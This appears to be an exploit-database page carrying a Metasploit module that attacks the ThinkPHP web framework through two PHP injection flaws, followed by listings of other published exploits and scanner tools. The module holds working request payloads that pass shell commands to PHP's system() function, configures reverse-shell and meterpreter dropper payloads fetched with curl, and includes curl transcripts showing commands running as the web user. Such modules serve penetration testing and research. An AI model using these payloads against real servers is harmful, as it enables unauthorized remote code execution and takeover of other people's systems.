"ThinkPHP - Multiple PHP Injection RCEs (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

linux

Release date

Exploit published date

2020-04-16

                
                    
                         Download file
                    
                
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'                    => 'ThinkPHP Multiple PHP Injection RCEs',
      'Description'             => %q{
        This module exploits one of two PHP injection vulnerabilities in the
        ThinkPHP web framework to execute code as the web user.

        Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
        vulnerable to a separate vulnerability. The module will automatically
        attempt to detect the version of the software.

        Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
      },
      'Author'                  => [
        # Discovery by unknown threaty threat actors
        'wvu' # Module
      ],
      'References'              => [
        # https://www.google.com/search?q=thinkphp+rce, tbh
        ['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP
        ['CVE', '2019-9082'],  # Open Source BMS 1.1.1 using ThinkPHP
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
      ],
      'DisclosureDate'          => '2018-12-10', # Unknown discovery date
      'License'                 => MSF_LICENSE,
      'Platform'                => ['unix', 'linux'],
      'Arch'                    => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged'              => false,
      'Targets'                 => [
        ['Unix Command',
          'Platform'            => 'unix',
          'Arch'                => ARCH_CMD,
          'Type'                => :unix_cmd,
          'DefaultOptions'      => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
        ],
        ['Linux Dropper',
          'Platform'            => 'linux',
          'Arch'                => [ARCH_X86, ARCH_X64],
          'Type'                => :linux_dropper,
          'DefaultOptions'      => {
            'CMDSTAGER::FLAVOR' => :curl,
            'PAYLOAD'           => 'linux/x64/meterpreter/reverse_tcp'
          }
        ]
      ],
      'DefaultTarget'           => 1,
      'Notes'                   => {
        'Stability'             => [CRASH_SAFE],
        'Reliability'           => [REPEATABLE_SESSION],
        'SideEffects'           => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    register_advanced_options([
      # NOTE: You may want to tweak this for long-running commands like find(1)
      OptFloat.new('CmdOutputTimeout',
                   [true, 'Timeout for cmd/unix/generic output', 3.5])
    ])

    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
    import_target_defaults
  end

=begin
  wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  > GET /index.php?s=1353 HTTP/1.1
  > Host: 127.0.0.1:8080
  > User-Agent: curl/7.54.0
  > Accept: */*
  >
  < HTTP/1.1 404 Not Found
  < Date: Mon, 13 Apr 2020 06:42:15 GMT
  < Server: Apache/2.4.25 (Debian)
  < X-Powered-By: PHP/7.2.5
  < Content-Length: 7332
  < Content-Type: text/html; charset=utf-8
  <
  { [7332 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  5.0.20wvu@kharak:~$
=end
  def check
    # An unknown route will trigger the ThinkPHP copyright with version
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {'s' => rand_text_alpha(8..42)}
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)
      return CheckCode::Unknown(
        'Target did not respond with ThinkPHP copyright.'
      )
    end

    # Get the first copyright <span> containing the version
    version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text

    unless (version = version.scan(/^V([\d.]+)$/).flatten.first)
      return CheckCode::Detected(
        'Target did not respond with ThinkPHP version.'
      )
    end

    # Make the parsed version a comparable ivar for automatic exploitation
    @version = Gem::Version.new(version)

    if @version <= Gem::Version.new('5.0.23')
      return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.")
    end

    CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # This is just extra insurance in case I screwed up the check method
    unless @version
      fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')
    end

    print_status("Targeting ThinkPHP #{@version} automatically")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # XXX: Only opts[:noconcat] may induce responses from the server
      execute_cmdstager
    else # This is just extra insurance in case I screwed up the info hash
      fail_with(Failure::NoTarget, "Could not select target #{target['Type']}")
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    if @version < Gem::Version.new('5.0.23')
      exploit_less_than_5_0_23(cmd)
    elsif @version == Gem::Version.new('5.0.23')
      exploit_5_0_23(cmd)
    else # This is just extra insurance in case I screwed up the exploit method
      fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}")
    end
  end

=begin
  wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  > GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
  > Host: 127.0.0.1:8080
  > User-Agent: curl/7.54.0
  > Accept: */*
  >
  < HTTP/1.1 200 OK
  < Date: Mon, 13 Apr 2020 06:43:45 GMT
  < Server: Apache/2.4.25 (Debian)
  < X-Powered-By: PHP/7.2.5
  < Vary: Accept-Encoding
  < Transfer-Encoding: chunked
  < Content-Type: text/html; charset=UTF-8
  <
  { [60 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  wvu@kharak:~$
=end
  def exploit_less_than_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, 'index.php'),
      'vars_get'    => {
        's'         => '/Index/\\think\\app/invokefunction',
        'function'  => 'call_user_func_array',
        'vars[0]'   => 'system', # TODO: Debug ARCH_PHP
        'vars[1][]' => cmd
      },
      'partial'     => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # HACK: Print half of the doubled-up command output
    vprint_line(res.body[0, res.body.length / 2])
  end

=begin
  wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
  > POST /index.php?s=captcha HTTP/1.1
  > Host: 127.0.0.1:8081
  > User-Agent: curl/7.54.0
  > Accept: */*
  > Content-Length: 72
  > Content-Type: application/x-www-form-urlencoded
  >
  } [72 bytes data]
  * upload completely sent off: 72 out of 72 bytes
  < HTTP/1.1 200 OK
  < Date: Mon, 13 Apr 2020 06:44:05 GMT
  < Server: Apache/2.4.25 (Debian)
  < X-Powered-By: PHP/7.2.12
  < Vary: Accept-Encoding
  < Transfer-Encoding: chunked
  < Content-Type: text/html; charset=UTF-8
  <
  { [60 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  wvu@kharak:~$
=end
  def exploit_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
      'method'                   => 'POST',
      'uri'                      => normalize_uri(target_uri.path, 'index.php'),
      'vars_get'                 => {'s' => 'captcha'},
      'vars_post'                => {
        '_method'                => '__construct',
        'filter[]'               => 'system', # TODO: Debug ARCH_PHP
        'method'                 => 'get',
        'server[REQUEST_METHOD]' => cmd
      },
      'partial'                  => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # Clean up output from cmd/unix/generic
    vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, ''))
  end

end

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-11-27	"libupnp 1.6.18 - Stack-based buffer overflow (DoS)"	dos	linux	"Patrik Lantz"
2020-11-24	"ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)"	webapps	linux	"Giuseppe Fuggiano"
2020-10-28	"Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion"	webapps	linux	"Ivo Palazzolo"
2020-10-28	"PackageKit < 1.1.13 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"aptdaemon < 1.1.1 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"Blueman < 2.1.4 - Local Privilege Escalation"	local	linux	"Vaisha Bernard"
2020-09-11	"Gnome Fonts Viewer 3.34.0 - Heap Corruption"	local	linux	"Cody Winkler"
2020-07-10	"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution"	remote	linux	SpicyItalian
2020-07-06	"Grafana 7.0.1 - Denial of Service (PoC)"	dos	linux	mostwanted002

Release Date	Title	Type	Platform	Author
2020-05-25	"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)"	remote	hardware	Metasploit
2020-05-25	"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"	remote	windows	Metasploit
2020-05-22	"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)"	remote	multiple	Metasploit
2020-05-19	"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)"	remote	php	Metasploit
2020-05-01	"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)"	remote	multiple	Metasploit
2020-04-28	"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)"	local	windows	Metasploit
2020-04-20	"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)"	remote	linux	Metasploit
2020-04-17	"Nexus Repository Manager - Java EL Injection RCE (Metasploit)"	remote	linux	Metasploit
2020-04-16	"ThinkPHP - Multiple PHP Injection RCEs (Metasploit)"	remote	linux	Metasploit
2020-04-16	"Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)"	remote	linux	Metasploit
2020-04-16	"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)"	local	macos	Metasploit
2020-04-16	"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)"	remote	multiple	Metasploit
2020-04-16	"Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)"	remote	java	Metasploit
2020-04-16	"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)"	remote	php	Metasploit
2020-04-16	"TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)"	remote	linux_mips	Metasploit
2020-04-16	"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)"	remote	windows	Metasploit
2020-03-31	"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"	remote	hardware	Metasploit
2020-03-31	"Redis - Replication Code Execution (Metasploit)"	remote	linux	Metasploit
2020-03-31	"SharePoint Workflows - XOML Injection (Metasploit)"	remote	windows	Metasploit
2020-03-31	"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"	remote	multiple	Metasploit
2020-03-17	"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"	remote	linux	Metasploit
2020-03-17	"ManageEngine Desktop Central - Java Deserialization (Metasploit)"	remote	multiple	Metasploit
2020-03-10	"PHPStudy - Backdoor Remote Code execution (Metasploit)"	remote	php	Metasploit
2020-03-10	"Nagios XI - Authenticated Remote Command Execution (Metasploit)"	remote	linux	Metasploit
2020-03-09	"PHP-FPM - Underflow Remote Code Execution (Metasploit)"	remote	php	Metasploit
2020-03-09	"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)"	remote	multiple	Metasploit
2020-03-09	"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)"	remote	multiple	Metasploit
2020-03-09	"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)"	local	linux	Metasploit
2020-03-09	"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)"	remote	multiple	Metasploit
2020-03-09	"Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)"	remote	windows	Metasploit

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"ThinkPHP - Multiple PHP Injection RCEs (Metasploit)"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.